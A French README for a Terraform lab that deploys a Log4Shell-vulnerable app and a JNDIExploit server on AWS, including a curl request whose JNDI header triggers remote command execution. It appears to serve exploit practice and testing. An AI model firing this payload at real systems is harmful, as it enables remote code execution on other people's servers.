
Un Terraform pour déployer une application vulnérable et un JDNIExploit pour travailler avec CVE-2021-44228
Un Terraform pour déployer une application vulnérable et un JNDIExploit pour fonctionner avec CVE-2021-44228
Ce Terraform crée deux instances sur un VPC dans AWS Cloud.
Vous avez juste besoin d'exporter vos AWS_ACCESS_KEY_ID et AWS_SECRET_ACCESS_KEY
Une instance est JNDIExploit.
La seconde est une Vulnérable-App pour l'exploit log4j
Veuillez remplacer votre clé publique SSH dans Terraform avant d'appliquer
terraform init
terraform plan
terraform apply --auto-approve
Après le déploiement sur AWS, vous pouvez l'exploiter avec une requête curl et vérifier la création du fichier dans /tmp sur le conteneur de l'application vulnérable.
curl ${vulnerable-app-IP}:8090 -H 'X-Api-Version: ${jndi:ldap://${JNDIExploit-IP}:1389/Basic/Command/Base64/dG91Y2ggL3RtcC9wd25lZAo=}'
Sur le serveur de l'application vulnérable, exécutez la commande suivante pour vérifier l'exécution de la commande. Vous devriez voir le fichier pwned
sudo docker exec -ti vulnerable-app ls /tmp